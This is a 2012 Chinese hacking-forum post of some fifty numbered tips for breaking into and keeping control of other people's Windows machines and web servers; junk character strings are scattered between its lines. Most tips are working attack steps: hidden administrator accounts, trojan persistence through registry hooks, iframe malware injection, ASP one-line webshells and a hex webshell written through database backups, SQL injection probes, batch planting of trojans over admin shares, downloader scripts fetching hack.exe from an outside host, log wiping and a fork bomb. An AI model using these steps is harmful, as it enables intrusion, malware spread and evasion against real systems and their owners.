中国网络渗透测试联盟
标题:
一些笔记
[打印本页]
作者:
admin
时间:
2012-9-15 14:51
标题:
一些笔记
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
& N) z1 P* u1 p$ l y1 U
cacls C:\windows\system32 /G hqw20:R
' {+ ^+ N0 v0 R# T
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
8 ]6 t0 ?6 S. V. p+ w
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
) \. P0 N0 {9 F3 C, B6 |& |# }
/ T& s! o: Q0 a# s9 z
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
1 |1 x. C3 T+ W( R
2 o3 ~% X+ U! Q7 q4 l' \
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。
# q5 I$ b4 b7 [
: Y6 ~, {6 Z9 I# H) g* {( B2 R
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
5 E! a8 U" U) C4 U9 E. m
* A0 o8 a$ {9 Z' ]* X) Q
5、利用INF文件来修改注册表
; k+ F' _! ?: r3 [
[Version]
: Q- m e. m: u8 u- e: m
Signature="$CHICAGO$"
/ b h( ?2 O v
[Defaultinstall]
0 c' b7 t: t2 k+ Y6 R" l5 b* P4 ?
addREG=Ating
0 p2 f$ h+ M! r) h+ S5 _
[Ating]
( g) ?. y- E4 ~ u9 x
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"
+ G3 [) b' K* {* X' Z# B+ U
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
0 D3 r9 h% Z" g, ? M z
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
7 u' E+ _; k# E; K2 I5 m
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
: G- F( {1 [5 N# {8 a2 b' v
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
5 j; F% D3 v8 ~6 G5 I _
HKEY_CURRENT_CONFIG 简写为 HKCC
u) b# T9 q# k9 u( B, Y9 \
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
) K; x. N4 M" W2 i: S% z" l
"1"这里代表是写入或删除注册表键值中的具体数据
* B' Z. T* D1 E- ^
5 |- e7 ^/ d$ S+ X) ^3 a7 M! c
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
6 r0 P9 H% ^7 o4 f- i
多了一步就是在防火墙里添加个端口,然后导出其键值
- l# R7 l% I$ }/ ~0 }2 J
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
0 W+ n+ h$ X& n
* X; y8 ]3 P7 `2 W1 X9 z3 L1 a
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
8 D/ y8 g: J: N* v) o" l
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
3 N% {) p; O1 W
, z' I% J" O0 T2 m
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
% N; V" A. U& }
3 r2 @7 Y8 B% v8 {7 ]! l7 V& \3 Z
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
" c6 V4 a5 D, C3 z3 f( s
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
+ ]1 u3 C% o' R, E- n e V
. W) S1 B7 I) y- ?
10、用google帮我们找网站后台,搜索”filetype:asp site:
www.hack6.com
inurl:login”
8 Z" M+ t3 {* _7 @% w4 d
9 u( r# v& w7 e
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
7 ]/ u- y8 Q U7 l5 k- h( k
用法:xsniff –pass –hide –log pass.txt
4 m6 J; y$ P0 }% e7 E5 u
* U2 I! ~! M0 Z6 ? F, g( l4 B N# A
12、google搜索的艺术
+ Z0 z* M/ c$ N1 U$ i9 `5 K
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
Y& c$ o! i1 Q' R
或“字符串的语法错误”可以找到很多sql注入漏洞。
; t4 @9 W! F6 a
. r9 u( }9 S: g7 }; i. }" A( f
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
* E. O. m& V: \0 K. H
; B4 T/ z1 I# p- B
14、cmd中输入 nc –vv –l –p 1987
5 l8 r( h$ r0 u' A" {" ]+ N
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
8 s- R2 T/ o2 U' }9 l7 @
! g7 h% h0 @' |6 h ]8 L: C0 Z
15、制作T++木马,先写个ating.hta文件,内容为
4 l9 d! s+ X, D+ @! y7 y2 h, l
<script language="VBScript">
8 ^ `& S1 ~' ^
set wshshell=createobject ("wscript.shell" )
$ \1 g+ E& G$ U& Z# n$ a
a=wshshell.run("你马的名称",1)
* \3 H3 C1 b- N- w5 Q: O9 c$ Z- J& ^
window.close
# \/ |! J. U7 S/ s4 P
</script>
0 O- X! B; _9 I
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
" J' Y1 v) l5 a
% C( F) f4 C+ g! r
16、搜索栏里输入
# d( `6 b7 m; o4 P `
关键字%'and 1=1 and '%'='
x# a. m9 j# k% G1 `+ w
关键字%'and 1=2 and '%'='
( {) x. H0 \ W$ W! F( [1 R8 d
比较不同处 可以作为注入的特征字符
' P/ |2 M9 Q$ {- S: \+ E
# _7 f2 s! T* `( R7 k0 T* Y# |3 ?
17、挂马代码<html>
4 q6 a) d0 o0 `' M0 Q9 B
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
' u1 h, R2 @0 Q3 o6 a1 ]' J2 r( P: s
</html>
& U2 ]! I9 l* Y* E* c
! g, {" X% @- J6 _8 B
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
5 ?, i& L5 ~9 N- Y) D
net localgroup administrators还是可以看出Guest是管理员来。
$ h3 t+ K* B( K5 _
& q; F! }4 U/ m7 ^0 r; n9 F, p
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
* q9 y: L9 m3 a' n; X% C( _5 _0 T
用法: 安装: instsrv.exe 服务名称 路径
3 |- B* y* Q, K
卸载: instsrv.exe 服务名称 REMOVE
/ x( U8 q) ~% \: I; U
: m8 m X8 J/ T4 m
/ z) d( |' Y/ V! x7 d( F6 v' N0 A
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
* ^, N+ P" Z7 {. L; e" m# B
不能注入时要第一时间想到%5c暴库。
9 A- C7 i% q" @6 J! C; ~' D
2 S. m5 o% J: B8 w# V4 f
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
) o0 ~5 K! P3 I' i8 @8 ~# `0 c( b
0 |7 }/ a: F- X: C% O9 T5 H& W: A
23、缺少xp_cmdshell时
5 z9 m- b7 d% o; ]6 O6 d
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
! {6 e0 q$ h( f; n, C) e. A9 m
假如恢复不成功,可以尝试直接加用户(针对开3389的)
; ?9 N" b" K% W/ ]- a% o
declare @o int
7 [& ^: U/ a6 n8 d& _
exec sp_oacreate 'wscript.shell',@o out
8 h& Z) R6 ^0 x- r* J& s
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
! J5 d$ D: p# e+ n
( p' C# E% V! x' K3 v+ F
24.批量种植木马.bat
4 @1 w% O9 F% m( j% e! a$ G
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
1 o8 {; C) ^, S6 o; a" t5 w+ l' y
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
; Y' X) {* b9 ^" K! j ~% ~
扫描地址.txt里每个主机名一行 用\\开头
" R) V; m- l2 p1 b0 I' f
1 G3 p/ q& Y4 L/ ^
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
# S: \! @' p6 ^7 [
8 Y5 o9 K8 a: P; U x
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
, }5 ` D& i6 h, L
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
% y [7 {5 y& V# h- c8 l
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
, o- |& S1 Y0 \" `/ P/ h
) i1 e- S( f, s) s6 E3 d
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
8 j, l7 x2 |5 x( j6 s
然后用#clear logg和#clear line vty *删除日志
2 Z6 O, b8 a( G8 L
3 w% M+ v. @1 M! e
28、电脑坏了省去重新安装系统的方法
/ K- T# x2 o# ?) o; J
纯dos下执行,
H5 X6 t# y8 ~
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
3 G# v9 T- Z* W2 v
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
; R$ O( |# A+ \8 H
2 x2 X3 d. [& F
29、解决TCP/IP筛选 在注册表里有三处,分别是:
: G2 h( n' y! [' y" ?0 j
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
5 ?3 N0 E, k. K& N* b
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
8 L4 z V9 c# ?- S
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
* L+ j" L8 B% p$ y) ?+ n1 E
分别用
( L/ N' s7 o9 f* {
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
9 w9 H8 B, u0 p
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
. Q$ O0 y- n! s' F: z$ x3 `
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
/ ]8 z' `. j1 L2 y+ g6 T
命令来导出注册表项
: A8 `" _6 i: ]$ O+ W
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
0 L! U: \% \2 S1 U5 @
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
: w; I" h* ~/ A+ Q4 ]% H
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
$ t |; u; A: `0 T8 F E% C
) M) m7 P' V/ g) O7 l
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
0 p2 Q* u0 C/ H9 g+ s+ R
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
) Q, N; ?6 c0 B8 ^! ]
: O+ _* I" |5 w& o: u/ [
31、全手工打造开3389工具
( z# o4 R, V, ]( ]0 I1 Q' _+ M
打开记事本,编辑内容如下:
+ f+ [4 m' ] y" _5 O
echo [Components] > c:\sql
0 F5 X3 J# Q/ i8 O* O( i* f
echo TSEnable = on >> c:\sql
8 C1 d/ _: A" J* h% j' X: m
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
3 q- r/ P4 N' F; P% L! Y1 l1 }/ t
编辑好后存为BAT文件,上传至肉鸡,执行
( V9 r% x0 W/ o' l
, r/ Y+ P. h6 {9 D. i0 a
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
; K' A4 B0 Y1 u4 Q- `% `
: m; u1 r0 g& t; d N
33、让服务器重启
0 T1 c& T3 C/ ?/ @( Y& G. X
写个bat死循环:
- [: H" ~, M( K/ b
@echo off
- b* B" f. E& C! R
:loop1
' c. R/ T7 G9 W. W! e
cls
2 M9 `7 Z3 q: R( K X4 O/ ^2 |
start cmd.exe
9 I$ Z7 c+ L8 \, t3 z" m. t$ O p2 n/ W
goto loop1
O! [. X# J; D% x1 a: f5 C
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
& B% y( l* a2 }# Q Q
6 w4 w$ A0 }) X% g* @& R
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
+ Z$ `* V2 Y8 x( R7 N- T+ U
@echo off
; i ?& }& ~5 [& N
date /t >c:/3389.txt
+ S% \2 |7 H0 a- q
time /t >>c:/3389.txt
% x0 ?4 g3 Y8 M2 k$ F( K- f) @8 p
attrib +s +h c:/3389.bat
% B- S" M1 | G P1 @; m, y
attrib +s +h c:/3389.txt
4 c& _* x. ?' k( y9 j$ T
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
1 a1 c4 ?6 n+ n' ~* E2 W
并保存为3389.bat
% X; q: Q/ W/ W- \+ `& X
打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
9 w' }6 N% o& d1 M& `6 {2 i5 D. X
: o; N$ p, h3 S% E1 ]4 ]$ o
35、有时候提不了权限的话,试试这个命令,在命令行里输入:
* X g! q5 O! B5 K
start
http://www.hack520.org/muma.htm
然后点执行。(muma.htm是你上传好的漏洞网页)
: E k8 ?# |5 q! b) h* }
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
0 o/ b: U1 J+ F P+ E8 m A
0 _8 a& C( x1 m( X' n
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
7 m6 ~2 Q- r$ s: F. r0 k
echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
7 G: j$ q( @) t
echo 你的FTP账号 >>c:\1.bat //输入账号
$ [. A' h& q5 S& b9 {
echo 你的FTP密码 >>c:\1.bat //输入密码
4 S/ `6 z+ C; B* B9 ^1 E7 n. u
echo bin >>c:\1.bat //登入
! I1 j: ~" C" P S9 c0 e" J
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
! \6 N% y. Z w' N: q* j: i6 X, u
echo bye >>c:\1.bat //退出
3 U# N7 J) Z+ }9 `
然后执行ftp -s:c:\1.bat即可
5 e8 G0 l. M( N2 g3 w% E3 K
/ ]8 m0 r1 ^0 ^/ c0 m
37、修改注册表开3389两法
, L$ v8 Q+ r* Y4 s9 }/ z9 B" V
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
5 ^0 i3 B# ~% q" ~/ Z
echo Windows Registry Editor Version 5.00 >>3389.reg
& r$ u) K( c5 l# y2 G
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
+ e( X f! \4 a1 z
echo "Enabled"="0" >>3389.reg
3 Y6 k. P0 b9 Z1 @4 f, `
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
3 Q+ r$ t# P W# \8 u( j: A. g/ A: A
NT\CurrentVersion\Winlogon] >>3389.reg
1 m1 Z2 A6 ~: m0 y* K% i* }# C
echo "ShutdownWithoutLogon"="0" >>3389.reg
! R* P9 y# G* a$ |3 q+ o
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
& {. \4 ^, w |. k
>>3389.reg
) U4 w( q) R: ~6 |( A$ e" ~
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
+ H9 O7 q: P' X9 H/ T- \: j; F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
$ e5 P' k. P3 r2 c8 [/ D' f
>>3389.reg
, D4 ^: i! A. Q( c# U
echo "TSEnabled"=dword:00000001 >>3389.reg
* k9 ?4 Q& M, g; `
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
& S7 X! z0 U4 u5 m+ r! W
echo "Start"=dword:00000002 >>3389.reg
! q, `0 E, k" i) D; @; y0 R" V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
8 ^+ W4 O" v9 o
>>3389.reg
1 O6 {, k9 A- E _
echo "Start"=dword:00000002 >>3389.reg
. x, w) n( N1 X( R
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
. {3 G. y( n& H( v6 d; }3 k( u- n
echo "Hotkey"="1" >>3389.reg
! @' g/ g& [8 S6 E" y. T6 p& ]
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" b+ N5 d% d2 S, @7 g
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
; f7 Q6 E! b4 k
echo "PortNumber"=dword:00000D3D >>3389.reg
! R! Z) s/ R8 {& Y% ~) V
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
3 n3 {* ^3 m' i6 z9 _5 s
Server\WinStations\RDP-Tcp] >>3389.reg
}0 p- _: U# ^' E7 k, w) i
echo "PortNumber"=dword:00000D3D >>3389.reg
3 X3 @8 [% I6 `& K3 S
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
5 u1 o* ?! e7 k- l$ t4 z5 ~2 w! H
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
, {( g& }( I, }
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效
+ |) A; v. f2 ?! d6 Q7 X/ k
(2)winxp和win2003终端开启
Y/ f$ G8 h8 ?) Y
用以下ECHO代码写一个REG文件:
; `0 B+ U# B M* G O* T% J
echo Windows Registry Editor Version 5.00>>3389.reg
$ ^5 O, O# Y/ b" W3 L! l9 a
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
2 T y# q; p8 y6 [& Z; s
Server]>>3389.reg
' K$ ]" O( I, E4 ]- Y
echo "fDenyTSConnections"=dword:00000000>>3389.reg
# `2 g4 y9 w1 ^* A" {
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 S, D6 R3 r8 B9 T& y' U
Server\Wds\rdpwd\Tds\tcp]>>3389.reg
+ j, I$ G6 N" L! m* E+ D- A2 a
echo "PortNumber"=dword:00000d3d>>3389.reg
8 t% @1 x9 @2 x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
6 x5 H" O0 R- ?* W4 v0 y
Server\WinStations\RDP-Tcp]>>3389.reg
s; o+ i" r8 q' X5 A% M( K, d5 j1 I
echo "PortNumber"=dword:00000d3d>>3389.reg
: x4 R; }( i: s* T( h# c8 T) F
然后regedit /s 3389.reg del 3389.reg
; R$ C/ b) S3 H6 \: n+ B4 w
XP下不论开终端还是改终端端口都不需重启
Y/ R/ g( _! l! t# J
! g% T) b5 }! u V$ x3 T- Q2 ^
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
( W& d I& l( b- Y8 r0 `
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
! n/ P% U3 J3 R" Y: q
6 L1 x. \6 q: {# E& a
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
! E' D E2 q! m2 f- w# x
(1)数据库文件名应复杂并要有特殊字符
: E( Z, `7 G5 `
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
$ T$ o# ^& B) v g5 C
将conn.asp文档中的
: V: x% {6 `1 W f" t/ F# v
DBPath = Server.MapPath("数据库.mdb")
0 }, O6 A+ T- w+ B5 I
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
' m" @3 U% D+ y6 Z \+ v% S) }
+ t8 |% o7 z: w9 G
修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
, M/ y1 B7 m5 k* x, N
(3)不放在WEB目录里
0 K- H/ M8 Y% y, m1 a8 A/ n
" E" g6 ^6 f# `2 T* L+ K2 @+ B
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
L0 p. J+ n Y2 V1 |8 ?
可以写两个bat文件
2 R3 y* i+ i, s/ ~. Y) m& D
@echo off
% ?& x0 u/ d2 g1 O3 \
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
- Q. ?0 u$ k+ [/ `& [/ U
@del c:\winnt\system32\query.exe
$ m7 [6 @( y5 A9 N% U
@del %SYSTEMROOT%\system32\dllcache\query.exe
Q# G4 f- G3 W9 Y; z$ h
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
( h, Y C7 Z# W5 t/ B/ U
- B# c$ e1 Q/ g: m9 Z8 Y
@echo off
5 F/ _2 Q+ ?5 O2 d) F, L
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
1 b7 K9 d& R8 r4 S: e4 z
@del c:\winnt\system32\tsadmin.exe
. b0 L6 S2 G3 }% X
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
4 j, J7 s# e! M
1 [6 R: x6 ~( B
41、映射对方盘符
7 W, N% l+ U4 z$ h" M/ b0 Z& B
telnet到他的机器上,
- ^4 S7 o4 ^& f1 R
net share 查看有没有默认共享 如果没有,那么就接着运行
& A- D9 Q% j5 w' c# Y
net share c$=c:
9 @' E9 i3 |# A' \7 {9 B
net share现在有c$
& v. q7 ^# m# Z, x, K$ z% d
在自己的机器上运行
9 x1 l. F4 J9 @) P5 d _
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
6 \% p0 n6 E$ Y/ t/ L# ?) l
+ n& v- V1 ^2 q8 m9 R2 L
42、一些很有用的老知识
' b& j6 L" q1 B. r# o$ R" }! N
type c:\boot.ini ( 查看系统版本 )
4 G" P) k$ Y& z6 A6 j5 U, }$ ?9 X
net start (查看已经启动的服务)
7 {: t& `& c: {: D" ^( d
query user ( 查看当前终端连接 )
5 r6 }- [ r" I
net user ( 查看当前用户 )
7 B: \3 M! x# O d5 m9 t4 p
net user 用户 密码/add ( 建立账号 )
) a3 T0 m9 J5 B( z4 a
net localgroup administrators 用户 /add (提升某用户为管理员)
( I7 ]: P* T J! _# v2 f( K
ipconfig -all ( 查看IP什么的 )
: ?' m2 A! r% Y$ E
netstat -an ( 查看当前网络状态 )
( ?$ I, B' |- P4 s' e' ` }
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
$ B N( g! E( U4 y$ g/ \
克隆时Administrator对应1F4
$ r1 s; C* O) b' u I
guest对应1F5
6 B( u6 P0 g _6 W0 p, Z/ x
tsinternetuser对应3E8
, Q( U; @' H# G7 o$ v8 z: D# e: a% u
: \# i- V3 N" P" j1 H5 w0 @
43、如果对方没开3389,但是装了Remote Administrator Service
7 Y, M5 k' \5 e: n. E) s5 Z: ]
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
5 j3 H. B* ]& _
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
+ W* `3 k- [9 m0 A/ ]% E
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
) L3 i* H. {$ b+ s$ S* L
q. ^& O, a) f
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
; I% g4 F) r( n0 \1 q
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
+ H4 }; ^6 y; d9 Q+ L
0 ^! f) Y' v& f5 o1 D" g. g8 S
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
' h. f% s1 f& n
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
! j7 C' I! I" x( j9 ^3 i
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
1 H) e: v8 v- l L
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
V3 u Y( ^ i
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
$ T, s: K# K& i* b8 P" u/ X$ n
(这是完整的一句话,其中没有换行符)
. Y L' q- s- q/ f" R6 F% F. C1 M. f4 E
然后下载:
: ^( d7 f' @% `/ e) ?
cscript down.vbs
http://www.hack520.org/hack.exe
hack.exe
6 ~ D4 S4 i5 K6 Q1 _# M
5 Q, {) Y4 o" E# k( B2 ?, K
46、一句话木马成功依赖于两个条件:
' l$ I! W/ |2 H
1、服务端没有禁止adodb.Stream或FSO组件
0 _# a. M2 y e
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
0 d/ y' T6 z8 s( c" Z
& `7 B+ m( e! D3 A5 m) c
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
) d0 T5 m5 D( @3 I6 J Z" u3 L
;alter database utsz set RECOVERY FULL--
% V8 w5 h0 _$ K( q5 l
;create table cmd (a image)--
c% I1 j, T1 h# G
;backup log utsz to disk = 'D:\cmd' with init--
8 k! h) U* J- ~+ P; O4 \, G7 Q
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
]; l: v3 v5 ]/ y3 I6 l
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
1 e0 d6 r0 E- `* u5 Q1 [
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
0 q" O$ r7 F7 z9 I2 n& z* R
- P, P+ I* a z9 K3 J1 J; S
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
. H9 N" s6 h( D; z0 h
* u! @8 _9 B6 j7 a0 I5 e" U. z! T
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
) v7 c" X8 S, D7 E% z
所有会话用 'all'。
0 u" P; h& V0 p* u
-s sessionid 列出会话的信息。
! W0 p; `; L5 L6 {
-k sessionid 终止会话。
0 r: n# [% o! M- q; x. j ~
-m sessionid 发送消息到会话。
1 H- }' c8 F/ ~* [5 N, F
' T2 g0 U& D/ X( V
config 配置 telnet 服务器参数。
4 `' R) e( S8 a5 R) c
. q2 ~ M, M7 P$ G, ?, A0 j& D
common_options 为:
% S" \/ }7 }2 D8 f( u3 I
-u user 指定要使用其凭据的用户
; F/ ]7 b) X6 t) h; s0 I2 [
-p password 用户密码
2 U0 _1 b4 V, B3 c1 I8 e: O
" W) I' J: M" I8 q7 A
config_options 为:
, x. h) [& g3 ]' |" d: y9 V i
dom = domain 设定用户的默认域
- y' N4 H7 [# H+ y4 i
ctrlakeymap = yes|no 设定 ALT 键的映射
+ w2 z4 }8 l, z1 u
timeout = hh:mm:ss 设定空闲会话超时值
: b9 N1 O; s! N- V. b& S
timeoutactive = yes|no 启用空闲会话。
! u1 n" X) t' |/ J/ b: g, [
maxfail = attempts 设定断开前失败的登录企图数。
5 h8 g# v) t7 M5 Z& n* |
maxconn = connections 设定最大连接数。
$ @1 P2 f2 h* t5 m0 T$ G( M4 z* x# a8 f
port = number 设定 telnet 端口。
" `" }& L0 Y( m( |9 C! N# X
sec = [+/-]NTLM [+/-]passwd
( @9 o' b7 [: K6 p
设定身份验证机构
) P) [- X- g! k' Q$ A, l( a8 O& H
fname = file 指定审计文件名。
0 O6 w& ~! D+ o2 C6 d
fsize = size 指定审计文件的最大尺寸(MB)。
. j- o3 G# R% E3 N# G) B5 D
mode = console|stream 指定操作模式。
/ o# `; s b( B# D4 I" N
auditlocation = eventlog|file|both
; F* h$ s) K8 |, ?( S) r5 _" i4 w# d
指定记录地点
" x: Q1 ^& E/ o9 M
audit = [+/-]user [+/-]fail [+/-]admin
3 Y+ z8 z* i+ [* j
7 t: C+ u, J4 }
49、例如:在IE上访问:
0 g) h! b0 f/ D( y7 E2 Y4 i
www.hack520.org/hack.txt
就会跳转到
http://www.hack520.org/
' V# V+ ~7 Y4 s" C: t! d( d
hack.txt里面的代码是:
- w) a3 R* ~% Y7 F/ m
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
+ c" ]7 m: r: j+ b- i9 s; L0 e
把这个hack.txt发到你空间就可以了!
# r `: Y8 O2 C7 M. n
这个可以利用来做网马哦!
# e- u3 N" g3 S
; [' [9 a% u6 U6 W
50、autorun的病毒可以通过手动限制!
& g3 j$ r z) n% y# R- |
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
+ [% h" L ^6 M! k0 W# k5 C
2,打开盘符用右键打开!切忌双击盘符~
/ _1 Q9 ~# K, J7 s
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
